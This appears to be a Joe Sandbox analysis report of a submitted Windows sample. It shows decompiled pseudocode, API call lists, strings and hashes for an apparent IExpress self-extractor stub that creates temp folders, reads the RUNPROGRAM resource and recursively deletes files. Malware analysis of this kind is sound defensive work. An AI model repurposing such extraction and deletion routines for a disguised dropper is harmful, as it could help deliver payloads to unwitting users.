0x0038302b
0x00383032
0x0038303c
0x00000000
0x0038303c
0x00383006
0x0038300c
0x00000000
0x00000000
0x0038300e
0x00383015
0x00000000
0x00000000
0x00000000
0x00383015
0x00382f80
0x00382f3f
0x00382f46
0x00382f5f
0x00382f5f
0x00382f64
0x00382f66
0x00000000
0x00000000
0x00000000
0x00382f66
0x00382f4f
0x00000000
0x00000000
0x00382f55
0x00382f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00382F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00382FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00382FC6
DecryptFileA.ADVAPI32 ref: 00382FE6
FreeLibrary.KERNEL32(00000000), ref: 00382FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0038301C

Part of subcall function 003851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00382F4D,?,00000002,00000000), ref: 00385201

Strings

advapi32.dll, xrefs: 00382F99
DecryptFileA, xrefs: 00382FC0
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00382FDB, 00383017

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-3123416969
Opcode ID: 40693dfcccb81e0f5ce92a6ad5051b7ec0d04a57cac2084af7d2a2953fa9102c
Instruction ID: 6f21a0a8899c1e91539bd4187f23665edd6f9378f899a561c73ce8090ea6b3da
Opcode Fuzzy Hash: 40693dfcccb81e0f5ce92a6ad5051b7ec0d04a57cac2084af7d2a2953fa9102c
Instruction Fuzzy Hash: E941B5B0A007059BDB37BB71AC4976A33ACAB44F55F1505E6E942C6291EF78CF80CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00385467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00385467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x388004; // 0xb25159a8
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x3891e4;
					_t42 = 0x104;
					E00381680(0x3891e4, 0x104);
					L14:
					_t13 = E003858C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x389124 = 0;
							_t14 = 1;
							L24:
							return E00386CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0038597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x388a20; // 0x0
						if(_t61 != 0) {
							 *0x388a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x389124 = E00386285();
						goto L22;
					}
					 *0x388a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E003853A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x3891e4;
				E00381781(0x3891e4, 0x104, __ecx,  &_v268);
				if(( *0x389a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0038658A(_t48, 0x104, 0x381140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0038658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00385472
0x00385479
0x00385481
0x00385484
0x0038551c
0x00385521
0x00385528
0x0038552d
0x0038552f
0x00385539
0x0038554d
0x0038554d
0x00385552
0x00385585
0x00385585
0x0038558b
0x0038558d
0x0038559d
0x0038559d
0x00385557
0x0038555e
0x00000000
0x00000000
0x00385560
0x00385566
0x00385569
0x0038556f
0x0038556f
0x00385581
0x00385581
0x00000000
0x00385581
0x00385545
0x0038557c
0x00000000
0x0038557c
0x00385547
0x00000000
0x00385547
0x0038548a
0x00385490
0x00385497
0x00000000
0x00000000
0x0038549d
0x003854ab
0x003854b4
0x003854c0
0x0038550c
0x00385511
0x00385515
0x00000000
0x00385515
0x003854c9
0x003854d6
0x003854d8
0x003854fe
0x00385503
0x00385507
0x00000000
0x00385507
0x003854da
0x003854dd
0x003854f7
0x00000000
0x003854f7
0x003854df
0x003854e2
0x003854f0
0x00000000
0x003854f0
0x003854e7
0x00000000
0x00000000
0x003854e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003854C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038556F

Part of subcall function 003853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003853FB
Part of subcall function 003853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385402
Part of subcall function 003853A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038541F
Part of subcall function 003853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038542B
Part of subcall function 003853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385434

Strings

mips, xrefs: 003854F7
alpha, xrefs: 003854F0
ppc, xrefs: 003854E9
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 0038547D, 00385481, 003854AB, 0038551C, 0038553C, 00385568
i386, xrefs: 003854FE

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3703068183
Opcode ID: 4bb639eeb91f6d23b9471fa6ba9d7d8820c9963e774ecb79861c44242301aa23
Instruction ID: 665bfe8cd5f421a7fa8eb7a148bd1280fb2fa24ceaf09a06aa1a57cc278bc195
Opcode Fuzzy Hash: 4bb639eeb91f6d23b9471fa6ba9d7d8820c9963e774ecb79861c44242301aa23
Instruction Fuzzy Hash: 5231C571B00B055BCB17BB3A9C45ABF779EAB82740F1501EAE803D6590DBB48E428795

Uniqueness

Uniqueness Score: -1.00%

Function 00382390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00382390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x388004; // 0xb25159a8
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00386CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00381680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E003816B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00381680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E003816B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E003816B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0038658A( &_v280, 0x104, 0x381140);
								E00382390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00382398
0x0038239e
0x003823a3
0x003823a5
0x003823ae
0x003823b3
0x003824cb
0x003824d2
0x003824d3
0x003824d4
0x003824df
0x003823c2
0x003823d1
0x003823db
0x003823e4
0x003823f6
0x003823fc
0x00382401
0x00000000
0x00000000
0x00000000
0x00000000
0x00382407
0x00382407
0x00382408
0x00382411
0x0038241f
0x0038247a
0x00382483
0x00382495
0x003824a3
0x00382421
0x0038242f
0x00382453
0x0038245d
0x00382466
0x00382472
0x00382472
0x0038242f
0x003824af
0x003824b5
0x003824be
0x003824c5
0x00000000
0x003824c5

APIs

FindFirstFileA.KERNELBASE(?,00388A3A,003811F4,00388A3A,00000000,?,?), ref: 003823F6
lstrcmpA.KERNEL32(?,003811F8), ref: 00382427
lstrcmpA.KERNEL32(?,003811FC), ref: 0038243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00382495
DeleteFileA.KERNEL32(?), ref: 003824A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 003824AF
FindClose.KERNELBASE(00000000), ref: 003824BE
RemoveDirectoryA.KERNELBASE(00388A3A), ref: 003824C5

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 172b1a0b9d0a3581f8a32aa6cc20bc213a54670d79d66e792910e7816bd9fa4e
Instruction ID: 361d8e4b6ba8cc339daac486707a5103713f407efcf4cdeb3cf04e2a4f595682
Opcode Fuzzy Hash: 172b1a0b9d0a3581f8a32aa6cc20bc213a54670d79d66e792910e7816bd9fa4e
Instruction Fuzzy Hash: 2931A471204740ABD322FB64CC8DAEB73ACABC4305F0449AEF99587190EB74990DC762

Uniqueness

Uniqueness Score: -1.00%

Function 00382BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00382BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x38a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x389124 = 0;
				if(E00382CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00382F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E003852B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x388a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x389a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00381F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x388588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x389124; // 0x80070002
				return _t7;
			}

0x00382c03
0x00382c0d
0x00382c18
0x00382c20
0x00382c2e
0x00382c32
0x00382c36
0x00382c3d
0x00382c43
0x00382c45
0x00382c47
0x00382c49
0x00382c4e
0x00382c4e
0x00382c47
0x00382c32
0x00382c20
0x00382c50
0x00382c54
0x00382c57
0x00382c64
0x00382c66
0x00382c6b
0x00382c6d
0x00382c74
0x00382c76
0x00382c7c
0x00382c7e
0x00382c87
0x00382c89
0x00382c89
0x00382c87
0x00382c7c
0x00382c74
0x00382c8e
0x00382c95
0x00382c98
0x00382c98
0x00382c9e
0x00382ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00386BB0,00380000,00000000,00000002,0000000A), ref: 00382C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00386BB0,00380000,00000000,00000002,0000000A), ref: 00382C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00382C28
CloseHandle.KERNEL32(00000000,?,?,00386BB0,00380000,00000000,00000002,0000000A), ref: 00382C98

Strings

HeapSetInformation, xrefs: 00382C22
Kernel32.dll, xrefs: 00382C13

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 2303df09250181af287888fa4fd773e42855fc39d2083e076f7dbc2a0b0cbfc9
Instruction ID: 1eba7d0cd5950e799f6c3a666cf519ff0e6ac9a79383dde8b4fa242388dadbb9
Opcode Fuzzy Hash: 2303df09250181af287888fa4fd773e42855fc39d2083e076f7dbc2a0b0cbfc9
Instruction Fuzzy Hash: 8611AC71200705ABE7237BB5AD88A7F37BDAB88790F4A04D6F901D7290DA24DC028761

Uniqueness

Uniqueness Score: -1.00%

Function 00386F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00386F40() {

				SetUnhandledExceptionFilter(E00386EF0); // executed
				return 0;
			}

0x00386f45
0x00386f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00386F45

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d66b9449cf29420fd5f527abef9c913fa05ca65963de5d5e026058ec91f7c4c7
Instruction ID: 0ca2e0f783ce027c975f92a50cf8cddb89832902a45cf6b5931b336b28a6e3d0
Opcode Fuzzy Hash: d66b9449cf29420fd5f527abef9c913fa05ca65963de5d5e026058ec91f7c4c7
Instruction Fuzzy Hash: FA90027425170047A6122B70DE1E45575995A4D743F8154E1E111C4498DB6050405712

Uniqueness

Uniqueness Score: -1.00%

Function 003855A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E003855A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x388004; // 0xb25159a8
				_v8 = _t28 ^ _t110;
				_t2 = E0038468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0038468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x389a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x388b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x388a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00386517(_t82, 0x7d2, 0, E00383210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x389a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x3891e4;
									_t40 = GetTempPathA(0x104, 0x3891e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00381781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00386952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0038597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00382630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0038658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x3891e4;
																					E00381781(0x3891e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00385467(0x3891e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00382630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0038597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00385467(0x3891e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x3891e4;
											_t70 = E00382630(0, 0x3891e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x3891e4;
												_t71 = E00385467(0x3891e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0038597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x388b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00385467(0x388b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E003844B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E003844B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x389124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E003844B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x389124 = E00386285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00386CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x003855ab
0x003855b2
0x003855c9
0x003855d5
0x003855d9
0x00385600
0x00385605
0x0038560a
0x0038560c
0x00385638
0x00385641
0x00385643
0x00385645
0x00385645
0x0038564c
0x00385652
0x00385657
0x00385659
0x00385696
0x0038569c
0x0038589f
0x003858a7
0x003858ac
0x003858b3
0x003858b5
0x003856a2
0x003856a2
0x003856a8
0x00000000
0x003856ae
0x003856ae
0x003856b9
0x003856bf
0x003856c1
0x003856f3
0x003856f3
0x00385705
0x0038570a
0x00385711
0x00385717
0x00385724
0x00385726
0x00385729
0x00385730
0x00385737
0x0038573d
0x00385740
0x00000000
0x00000000
0x00000000
0x00000000
0x0038572b
0x0038572b
0x0038572e
0x00385742
0x00385742
0x00385745
0x0038576b
0x0038576b
0x00000000
0x00385747
0x00385747
0x0038574d
0x0038574f
0x00385771
0x00385771
0x00385773
0x00000000
0x00385751
0x00385751
0x00385753
0x00000000
0x00385755
0x0038575b
0x00385760
0x00385762
0x00000000
0x00385764
0x00385764
0x00385769
0x0038577e
0x0038577e
0x00385781
0x00385788
0x0038578d
0x0038578f
0x003857b2
0x003857b8
0x003857bd
0x003857bf
0x003857cd
0x003857cd
0x003857dd
0x003857e3
0x003857ef
0x003857f5
0x003857f8
0x0038580a
0x0038580a
0x003857fa
0x00385802
0x00385802
0x0038580d
0x0038580f
0x00385830
0x00385836
0x0038583d
0x0038584b
0x00385851
0x00385855
0x0038585a
0x0038585c
0x00000000
0x0038585e
0x0038585e
0x00000000
0x0038585e
0x00385811
0x00385817
0x00385819
0x0038581f
0x00000000
0x0038581f
0x00385791
0x00385797
0x0038579c
0x0038579e
0x00000000
0x003857a0
0x003857a9
0x003857ae
0x003857b0
0x00000000
0x00000000
0x00000000
0x00000000
0x003857b0
0x0038579e
0x00000000
0x00000000
0x00000000
0x00385769
0x00385762
0x00385753
0x0038574f
0x00000000
0x00000000
0x00000000
0x0038572e
0x00000000
0x00385864
0x00385864
0x00385864
0x00385717
0x00000000
0x003856c3
0x003856c5
0x003856c9
0x003856ce
0x003856d0
0x00000000
0x003856d6
0x003856d6
0x003856d8
0x003856dd
0x003856df
0x00000000
0x003856e1
0x003856e2
0x003856e4
0x003856e6
0x003856eb
0x003856ed
0x00000000
0x003856f3
0x003856f3
0x00000000
0x0038586c
0x00385878
0x0038587e
0x00385882
0x00385883
0x00385889
0x0038588e
0x0038588e
0x00000000
0x00385896
0x003856ed
0x003856df
0x003856d0
0x003856c1
0x003856a8
0x0038565b
0x0038565b
0x0038565d
0x00385669
0x00385669
0x0038565f
0x0038565f
0x00385665
0x00385667
0x00000000
0x00000000
0x00385667
0x0038566c
0x00385673
0x00385678
0x0038567a
0x0038589b
0x0038589b
0x00385680
0x00385685
0x0038568c
0x00000000
0x0038568c
0x0038567a
0x0038560e
0x00385613
0x0038561a
0x00385620
0x00385626
0x00000000
0x00385626
0x003855db
0x003855e0
0x003855e7
0x003855f1
0x003855f6
0x003855f6
0x003855f6
0x003858b7
0x003858c7

APIs

Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003855CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00385638
LocalFree.KERNEL32(00000000), ref: 0038564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00385620

Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554

Part of subcall function 00386285: GetLastError.KERNEL32(00385BBC), ref: 00386285

